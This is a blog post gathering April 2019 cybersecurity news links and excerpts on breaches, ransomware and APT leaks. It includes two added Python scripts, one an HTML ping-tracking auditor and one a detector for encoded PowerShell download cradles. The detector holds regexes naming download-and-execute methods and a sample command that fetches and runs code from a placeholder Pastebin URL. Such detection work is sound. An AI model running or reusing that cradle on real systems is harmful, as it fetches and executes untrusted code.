This posting is here to collect cyber security news in April 2019.
I post links to security vulnerability news to comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
402 Comments
Tomi Engdahl says:
Fooling Automated Surveillance Cameras with Patchwork Color Printout
https://www.schneier.com/blog/archives/2019/04/fooling_automat.html
Tomi Engdahl says:
New DNS Hijacking Attacks
https://www.schneier.com/blog/archives/2019/04/new_dns_hijacki.html
DNS hijacking isn’t new, but this seems to be an attack of unprecedented scale
Tomi Engdahl says:
Source: Hacker holding Cleveland Hopkins International Airport systems hostage demands ransom via Bitcoin
http://www.cleveland19.com/2019/04/25/source-hacker-holding-cleveland-hopkins-international-airport-systems-hostage-demands-ransom-via-bitcoin/
Tomi Engdahl says:
Mary Madden / New York Times:
When low-income people fall victim to an online fraud or a data breach, the cascade of repercussions, both online and offline, can be devastating
http://www.nytimes.com/2019/04/25/opinion/privacy-poverty.html
Tomi Engdahl says:
Docker Hub Hacked – 190k accounts, GitHub tokens revoked, Builds disabled
https://news.ycombinator.com/item?id=19763413
During a brief period of unauthorized access to a Docker Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.
Tomi Engdahl says:
Man accused of using flash drives to steal money from multiple businesses
https://www.local10.com/news/florida/miami-dade/man-accused-of-using-flash-drives-to-steal-money-from-multiple-businesses
A man is facing multiple charges after he used flash drives to steal money from multiple businesses in Miami-Dade County, authorities said.
asked for printing services for an airline itinerary and handed the clerk a USB drive, which the clerk placed into a computer.
he left the business after paying a fee for the services.
Two days later, the manager noticed the computer screen had turned blue and the cursor on the screen was moving on its own, as though someone had gained unauthorized remote access.
Tomi Engdahl says:
‘Facebook is spying on me’: User gets ads for obscure things she’s just chatted about
https://www.mirror.co.uk/news/uk-news/facebook-isnt-spying-us-ads-12362519
Tyler Mears has been left baffled after two obscure products she had chatted about out loud randomly appeared as a targeted advert on her Facebook the next day
Tomi Engdahl says:
Microsoft Discovers Huawei Driver Allowing Backdoor Hack Into Laptops
https://www.zerohedge.com/news/2019-04-23/microsoft-discovers-huawei-driver-allowing-backdoor-hack-laptops
Tomi Engdahl says:
Security service monitor rejects bulk hack request involving millions of names
https://www.dutchnews.nl/news/2019/04/security-service-monitor-rejects-bulk-hack-request-involving-millions-of-names/
Tomi Engdahl says:
Hacked Lime scooters play offensive voice messages
https://www.brisbanetimes.com.au/national/queensland/hacked-lime-scooters-play-offensive-voice-messages-20190423-p51ghx.html
Tomi Engdahl says:
Andy Greenberg / Wired:
While many foreign phone carriers are sharing real-time SIM swap data with banks to stop financial fraud, US carriers are dragging their feet
http://www.wired.com/story/sim-swap-fix-carriers-banks
Tomi Engdahl says:
Mara Hvistendahl / Wired:
Inside the criminal investigation of an IT support technician who ordered his wife’s murder on a dark web site, which was a scam, and then killed her himself
http://www.wired.com/story/dark-web-bitcoin-murder-cottage-grove
Tomi Engdahl says:
New York Times:
Officials say FBI, DHS, NSA, and the US Cyber Command task forces, formed before midterms to combat foreign interference in elections, have been made permanent — WASHINGTON — The F.B.I. director warned anew on Friday about Russia’s continued meddling in American elections, calling it a “significant counterintelligence threat.”
https://www.nytimes.com/2019/04/26/us/politics/fbi-russian-election-interference.html
Tomi Engdahl says:
How to combat the threat of Android malware
Many antivirus apps are bad, but there are solutions.
https://www.popsci.com/android-malware-tips
Android malware is real, but the risk is higher outside the U.S.
The risk of malware on the Android operating system “depends on many different factors,” says Andreas Clementi, CEO of AV-Comparatives.
“Official stores such as Google Play are mostly used in western countries, where the risk of infection is very low,” Clementi says. “In Asian countries, where rooted devices and large number of third-party app stores can be found, the chance of installing a dangerous app is greatly increased.”
Furthermore, Android malware is different from Windows malware, and that leads to confusion when all you see are scary statistics.
“Numbers propagated in the media might be inflated, depending on how threats are defined,” Clementi says. “Some people define Adware and other potentially unwanted apps as threats. If those are counted as such, the numbers look very high, as there are a lot of potentially unwanted apps on Android.”
Most (but not all) Android antivirus apps are terrible
This spring, AV-Comparatives tested 250 antivirus apps, finding only 80 that detected a significant amount of malicious samples.
Tomi Engdahl says:
GitHub-Hosted Magecart Card Skimmer Found on Hundreds of Stores
https://www.bleepingcomputer.com/news/security/github-hosted-magecart-card-skimmer-found-on-hundreds-of-stores/
Tomi Engdahl says:
BEC fraud losses almost doubled last year
https://www.welivesecurity.com/2019/04/25/bec-fraud-losses-doubled-2018/
On the good news front, the FBI notes the success of its newly-established team in recovering some of the funds lost in BEC scams
Tomi Engdahl says:
Threat actors abuse GitHub service to host a variety of phishing kits
https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits
Editor’s Note:
As of Friday, April 19, GitHub had taken down all accounts hosting phishing material listed in this blog. GitHub has been extremely responsive in addressing this abuse of their systems.
Overview
As Proofpoint researchers have observed in the past, phishers and other threat actors are able to bypass whitelists and network defenses due to their widespread use of large consumer cloud storage sites, social networking, and commerce services such as Dropbox, Google Drive, Paypal, Ebay, and Facebook.
Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical $github_username.github.io domain.
Tomi Engdahl says:
TA505 Spear Phishing Campaign Uses LOLBins to Avoid Detection
https://www.bleepingcomputer.com/news/security/ta505-spear-phishing-campaign-uses-lolbins-to-avoid-detection/
Tomi Engdahl says:
CARBANAK Week Part Three: Behind the CARBANAK Backdoor
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html
CARBANAK Week Part Four: The CARBANAK Desktop Video Player
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html
Tomi Engdahl says:
AESDDoS Botnet Targets Vulnerability in Atlassian’s Confluence Server
https://www.securityweek.com/aesddos-botnet-targets-vulnerability-atlassian%E2%80%99s-confluence-server
Tomi Engdahl says:
P2P Flaws Expose Millions of IoT Devices to Remote Attacks
https://www.securityweek.com/p2p-flaws-expose-millions-iot-devices-remote-attacks
Vulnerabilities discovered by a researcher in a peer-to-peer (P2P) system named iLnkP2P expose millions of cameras and other Internet of Things (IoT) devices to remote attacks from the Internet, and no patches are available.
Paul Marrapese, a California-based security engineer, discovered two serious flaws in iLnkP2P, a system developed by Chinese firm Shenzhen Yunni Technology Company, Inc. iLnkP2P is a P2P solution that makes it easier for users to connect to their IoT devices from their phone or computer.
According to the expert, iLnkP2P is present in devices marketed under hundreds of brands, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM. Affected products include cameras, baby monitors and smart doorbells. Marrapese has conducted an Internet scan and identified over 2 million vulnerable devices.
Tomi Engdahl says:
Google to Block Logins From Embedded Browsers to Prevent Phishing
https://www.securityweek.com/google-block-logins-embedded-browsers-prevent-phishing
Google on Thursday announced that it will soon block login attempts from embedded browser frameworks in an effort to prevent man-in-the-middle (MitM) phishing attacks.
The tech giant says phishing attacks that involve traffic interception are difficult to detect when an embedded browser framework or a different type of automation platform is used for authentication.
As an example of an embedded browser framework Google provided its Chromium Embedded Framework (CEF), which is designed for embedding Chromium-based browsers in other applications.
Tomi Engdahl says:
Source Code of Iran-Linked Hacking Tools Posted Online
https://www.securityweek.com/source-code-iran-linked-hacking-tools-posted-online
The data, posted online by a group of alleged Iranian hackers called “Lab Dookhtegan,” is supposedly related to the infamous OilRig hackers. Also known as APT34 and active since at least 2014, the OilRig group is believed to be backed by the Iranian government.
Tomi Engdahl says:
WannaCry ‘Hero’ Marcus Hutchins Pleads Guilty to Creating Malware
https://www.securityweek.com/wannacry-hero-marcus-hutchins-pleads-guilty-creating-malware
Tomi Engdahl says:
Operator of Codeshop Cybercrime Marketplace Sentenced to Prison
https://www.securityweek.com/operator-codeshop-cybercrime-marketplace-sentenced-prison
Known online as “codeshop,” “xhevo,” “sindrom” and “sindromx,” Ametovski ran Codeshop, a website that offered stolen payment card data, bank account credentials, and personal information.
Tomi Engdahl says:
Hacker Group Exposes Iranian APT Operations and Members
https://www.bleepingcomputer.com/news/security/hacker-group-exposes-iranian-apt-operations-and-members/
Hackers have revealed details about the inner workings of a cyber-espionage group mostly known in the security community as OilRig, APT34, and HelixKitten, linked to the Iranian government.
Using the online name Lab Dookhtegan, the hackers used a Telegram channel to dump information about APT34’s infrastructure, hacking tools, members, and victims.
Tomi Engdahl says:
Europeans Hit with Multi-Stage Malware Loader via Signed Malspam
https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/
Tomi Engdahl says:
RevengeRAT Distributed via Bit.ly, BlogSpot, and Pastebin C2 Infrastructure
https://www.bleepingcomputer.com/news/security/revengerat-distributed-via-bitly-blogspot-and-pastebin-c2-infrastructure/
A malicious campaign targeting entities from North America, Europe, Asia, and the Middle East during March used a combination of pages hosted on Bit.ly, BlogSpot, and Pastebin to create a command-and-control (C2) infrastructure designed to avoid getting blocked by security solutions.
Tomi Engdahl says:
Apr 19
Wipro Intruders Targeted Other Major IT Firms
https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/
Tomi Engdahl says:
Microsoft loses control over Windows Tiles
https://www.golem.de/news/subdomain-takeover-microsoft-loses-control-over-windows-tiles-1904-140717.html
A service from Microsoft used to allow web page owners to deliver news on Windows Tiles as so-called Windows Live Tiles. After the service has been disabled, we were able to take over the corresponding subdomain and display our own Tile contents.
Tomi Engdahl says:
Hacker Breaks Into French Government’s New Secure Messaging App
https://thehackernews.com/2019/04/france-Tchap-secure-messenger.html
Tomi Engdahl says:
Zero-day XML External Entity (XXE) Injection Vulnerability in Internet Explorer Can Let Attackers Steal Files, System Info
https://blog.trendmicro.com/trendlabs-security-intelligence/zero-day-xml-external-entity-xxe-injection-vulnerability-in-internet-explorer-can-let-attackers-steal-files-system-info/
Tomi Engdahl says:
Mozilla Firefox to Enable Hyperlink Ping Tracking By Default
https://www.bleepingcomputer.com/news/software/mozilla-firefox-to-enable-hyperlink-ping-tracking-by-default/
For those not familiar with hyperlink auditing, it is an HTML feature that allows web sites to track link clicks by adding the “ping=” attribute to HTML links. When these links are clicked, in addition to navigating to the linked-to page, the browser will also connect to the page listed in the ping= attribute, which can then be used to record the click.
When these links are displayed on the page, they will appear as a normal link and if a user clicks on it, there is no indication that a connection is being made to a different page as well.
Privacy risk?
Earlier this month, we covered how Google Chrome, Opera, Microsoft Edge, and Safari enabled hyperlink auditing pings by default. While some browsers currently enable you to disable this feature, all of the mentioned browsers will no longer allow users to do so in the future.
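The ping attribute described in the comment above is easy to audit for: the following script (an added example, not code from the BleepingComputer article) lists every link on a page that carries ping beacons, marks the beacons that go to a third-party host, and emits a copy of the page with the attribute removed. The sample page is constructed for this example.

```python
"""Audit an HTML page for hyperlink-auditing beacons (<a ping="...">).

When such a link is clicked the browser also POSTs to every URL in the ping
attribute with no visible indication. This parser reports those beacons and
rebuilds the page without the attribute. Sample page below is constructed.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PingAuditor(HTMLParser):
    def __init__(self, page_url):
        # convert_charrefs=False keeps entities intact so the page can be re-emitted
        super().__init__(convert_charrefs=False)
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname
        self.findings = []   # dicts: href, targets, third_party
        self._out = []       # page text with ping attributes removed

    def handle_starttag(self, tag, attrs):
        raw = self.get_starttag_text()
        amap = dict(attrs)
        ping = amap.get("ping") if tag in ("a", "area") else None
        if ping:
            # ping is a space-separated URL list, resolved against the page like a browser does
            targets = [urljoin(self.page_url, u) for u in ping.split()]
            self.findings.append({
                "href": amap.get("href", ""),
                "targets": targets,
                "third_party": [urlsplit(t).hostname != self.page_host for t in targets],
            })
            kept = "".join(f' {k}="{escape(v or "", quote=True)}"' for k, v in attrs if k != "ping")
            raw = f"<{tag}{kept}{'/>' if raw.rstrip().endswith('/>') else '>'}"
        self._out.append(raw)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self._out.append(f"</{tag}>")

    # Everything else is copied through unchanged.
    def handle_data(self, data):
        self._out.append(data)

    def handle_entityref(self, name):
        self._out.append(f"&{name};")

    def handle_charref(self, name):
        self._out.append(f"&#{name};")

    def handle_comment(self, data):
        self._out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self._out.append(f"<!{decl}>")

    def cleaned(self):
        return "".join(self._out)


def audit(html, page_url):
    """Return (findings, html with ping attributes stripped)."""
    p = PingAuditor(page_url)
    p.feed(html)
    p.close()
    return p.findings, p.cleaned()


# Constructed sample: one ordinary link, one link with a same-site and a third-party beacon.
SAMPLE = ('<!DOCTYPE html><html><body><a href="/about">About</a>'
          '<a href="https://example.com/offer" ping="/log?c=1 https://tracker.example.net/p">'
          'Offer &amp; deal</a></body></html>')

if __name__ == "__main__":
    found, clean = audit(SAMPLE, "https://example.com/")
    for f in found:
        print(f["href"], "->", f["targets"], "third-party:", f["third_party"])
    print(clean)
```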
Tomi Engdahl says:
‘WannaCry Hero’ Marcus Hutchins Pleads Guilty to Making Banking Malware
https://motherboard.vice.com/en_us/article/qv7pad/marcus-hutchins-pleads-guilty-banking-malware-wannacry-hero
The researcher who helped stop the WannaCry ransomware pleaded guilty to two counts of hacking for writing banking malware in 2014.
Tomi Engdahl says:
Ransomware attack knocks Weather Channel off the Air
https://securityaffairs.co/wordpress/84164/hacking/weather-channel-ransomware-attack.html
A ransomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning; federal law enforcement is investigating the incident.
Tomi Engdahl says:
Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers
https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/
We discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. Since this technique is new and unfamiliar, it can potentially evade detection. Like many TSS campaigns, it disguises itself as a legitimate or well-known brand’s service provider to lure its victims. This campaign in particular uses Microsoft.
Tomi Engdahl says:
Naming and shaming nations that launch cyberattacks does work, say intel chiefs
https://www.zdnet.com/article/naming-and-shaming-nations-that-launch-cyberattacks-does-work-say-intel-chiefs/
Cybersecurity agencies explain when and why they attribute cyberattacks to other nations.
Tomi Engdahl says:
Confidence in the internet is wobbling: Here’s how to fix it, says cyber chief
https://www.zdnet.com/article/confidence-the-internet-is-wobbling-heres-how-to-fix-it-says-cyber-chief/
Tech industry has a responsibility to fix security for the next generation, says NCSC head.
There’s been a dip in confidence around how the internet works and it’s up to the cybersecurity industry and others to help fix problems and ensure that we don’t make the same mistakes that were being made when online connectivity was a new phenomenon as fresh internet-connected technologies emerge.
“These new generations of technologies still offer unparalleled opportunities to make all our lives so much better – our healthcare, our economy, our societies, but we have to think about managing the risks and the harm,” said Ciaran Martin, CEO of the National Cyber Security Centre (NCSC), the cybersecurity arm of the UK’s GCHQ intelligence agency.
Tomi Engdahl says:
Powershell, the Gandcrab infection and the long-forgotten server
GCHQ offshoot shares infosec hair-raisers
https://www.theregister.co.uk/2019/04/29/surprising_infosec_stories_from_ncsc/
CyberUK 2019: If your hair isn’t already grey enough, GCHQ staff have revealed a handful of infosec incidents that, in their words, “surprised us”.
The NCSC is part of GCHQ’s drive since 2013 to rebuild public trust and convince industry that the government is also interested in their economic wellbeing. As part of that, NCSC occasionally gets called in to help with particularly pernickety problems involving malware infections on corporate networks.
A look over the company’s logs revealed that Gandcrab had been introduced via a download from Pastebin – an encoded Base64 binary summoned through a Powershell command, no less.
CVE-2017-18362 explained half the story. The critical vuln allows anyone with access to the Kaseya server’s ManagedIT.asmx page through its web interface to execute arbitrary SQL queries. As Toby put it: “No whitelisting, no blacklisting, no password entry… send SQL commands and HTTP POST and it’ll just run it.”
But Powershell? Easy if you know about CVE-2018-20753, which allows (yup, you guessed it) unprivileged remote attackers to execute Powershell payloads on all managed devices.
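The Gandcrab case above turned on a PowerShell command carrying a base64 payload that pulled content from Pastebin. The script below (an added example, not NCSC or Kaseya code) scans constructed process-creation log lines for that pattern: it decodes any -EncodedCommand argument (base64 of UTF-16LE text) and flags Pastebin references, download cradles and Invoke-Expression. The pipe-separated log layout is an assumption.

```python
"""Flag PowerShell invocations that carry an encoded command fetching from Pastebin.

Assumed log layout per line: timestamp | host | image path | command line.
The log lines, hosts and the placeholder Pastebin URL below are constructed.
"""
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_FLAG = re.compile(r"^-e(?:c|nc|ncodedcommand)?$", re.I)

INDICATORS = {
    "pastebin": re.compile(r"pastebin\.com", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "embedded_base64": re.compile(r"FromBase64String", re.I),
}


def encode_ps(text):
    """Encode text the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Return the decoded script, or None if the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline):
    """Return an analysis dict for a PowerShell command line, or None for other processes."""
    tokens = cmdline.split()
    if not tokens or "powershell" not in tokens[0].lower():
        return None
    encoded, script = False, cmdline
    for i, tok in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(tok):
            encoded, script = True, decode_encoded_command(tokens[i + 1])
            break
    hits = [name for name, rx in INDICATORS.items() if script and rx.search(script)]
    # An encoded argument that does not decode at all is itself worth a look.
    suspicious = bool(hits) or (encoded and script is None)
    return {"encoded": encoded, "decoded": script, "indicators": hits, "suspicious": suspicious}


def scan_log(lines):
    """Return the suspicious entries from pipe-separated process-creation log lines."""
    results = []
    for line in lines:
        ts, host, _image, cmdline = (f.strip() for f in line.split("|", 3))
        a = analyse_command_line(cmdline)
        if a and a["suspicious"]:
            results.append({"timestamp": ts, "host": host, **a})
    return results


# Constructed sample log: a benign PowerShell run, an encoded Pastebin cradle, and cmd.exe.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
SAMPLE_LOG = [
    "2019-03-04T09:12:44Z | WS-17 | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -NoProfile -Command Get-Date",
    "2019-03-04T09:13:02Z | WS-17 | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE),
    "2019-03-04T09:14:10Z | SRV-01 | C:\\Windows\\System32\\cmd.exe | cmd.exe /c dir",
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["timestamp"], r["host"], r["indicators"], r["decoded"])
```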
Tomi Engdahl says:
Russia’s great firewall: is it meant to keep information in – or out?
https://www.theguardian.com/technology/2019/apr/28/russia-great-firewall-sovereign-internet-bill-keeping-information-in-or-out
Vladimir Putin will soon sign the ‘sovereign internet’ bill to allow greater monitoring of traffic. But what are its other consequences?
Tomi Engdahl says:
Norsk Hydro Says Cyber Attack Cost It Around $50 Mln
https://www.securityweek.com/norsk-hydro-says-cyber-attack-cost-it-around-50-mln
Global aluminium producer Norsk Hydro on Tuesday put the cost of a cyber attack targeting the Norwegian company in March at around $50 million.
In the night between March 18 and 19, the company became the target of a “massive” cyber attack involving ransomware, forcing it to disconnect from various sites and factories and switch to manual operations in others.
The attack also forced it to postpone the publication of its quarterly earnings, originally scheduled for Tuesday, to June 5.
Tomi Engdahl says:
ImmuniWeb Launches Free Testing Tool for Website Security and PCI Compliance
https://www.securityweek.com/immuniweb-launches-free-testing-tool-website-security-and-pci-compliance
Swiss-based web security company ImmuniWeb, known until recently as High-Tech Bridge, on Monday announced the availability of a free tool designed for testing websites.
The new Website Security Test tool checks sites for PCI DSS compliance (6.2, 6.5 and 6.6 requirements), it analyzes the content management system (CMS), checks the web server and content security policy (CSP), and looks for privacy issues.
Specifically, the tool checks if a web application firewall (WAF) is present, if the CMS and its components are up-to-date, if the JavaScript components are up-to-date, if cookies are properly configured, if web server directory listing is enabled, and if cryptojacking malware is detected.
https://www.immuniweb.com/websec/
Tomi Engdahl says:
Facebook to Fund Research on Social Media Impact on Elections
https://www.securityweek.com/facebook-fund-research-social-media-impact-elections
Facebook announced Monday its first research grants to academics studying the impact of social media on elections, part of an effort to prevent manipulation of social platforms.
The leading social network said some 60 researchers from 30 academic institutions across 11 countries were selected under a review process by the Social Science Research Council and the independent group Social Science One.
Tomi Engdahl says:
GDPR Conformance Does Not Excuse Companies from Vicarious Liability
https://www.securityweek.com/gdpr-conformance-does-not-excuse-companies-vicarious-liability
The UK supermarket chain Morrisons’ legal battle with 5,500 of its own employees over vicarious liability introduces a new threat element to the already complex and confusing demands of the EU’s General Data Protection Regulation (GDPR).
Tomi Engdahl says:
Backdoors in Huawei Equipment Discovered by Vodafone Italy in 2009
https://gizmodo.com/backdoors-in-huawei-equipment-discovered-by-vodaphone-i-1834408368?utm_campaign=socialflow_gizmodo_facebook&utm_source=gizmodo_facebook&utm_medium=socialflow
Vodafone Italy discovered backdoors in its Huawei home internet routers and software between 2009 and 2011 according to a new report from Bloomberg News. The backdoors have reportedly been fixed, but the revelations are still bad news for Huawei as the Chinese tech giant tries to secure contracts to build 5G infrastructure around the world.
Tomi Engdahl says:
Editors’ picks for 2018: ‘The African Union headquarters hack and Australia’s 5G network’
https://www.aspistrategist.org.au/editors-picks-for-2018-the-african-union-headquarters-hack-and-australias-5g-network/
Tomi Engdahl says:
‘One Ring’ Wireless Phone Scam
https://www.fcc.gov/consumers/guides/one-ring-wireless-phone-scam
If your phone rings once and then stops, think twice before returning the call. It may be a scam
Why Phone Fraud Starts With A Silent Call
https://www.npr.org/sections/alltechconsidered/2015/08/24/434313813/why-phone-fraud-starts-with-a-silent-call?t=1556689827658
Tomi Engdahl says:
Oh dear. Secret Huawei enterprise router snoop ‘backdoor’ was Telnet service, sighs Vodafone
We all want to see hard proof of deliberate espionage. This is absolutely not it
https://www.theregister.co.uk/2019/04/30/huawei_enterprise_router_backdoor_is_telnet/
Tomi Engdahl says:
Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies
https://motherboard.vice.com/en_us/article/d3np4y/hackers-steal-ransom-citycomp-airbus-volkswagen-oracle-valuable-companies
The data was stolen from Citycomp, which provides internet infrastructure for dozens of companies including Oracle, Airbus, Toshiba, and Volkswagen.
Tomi Engdahl says:
Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat
https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/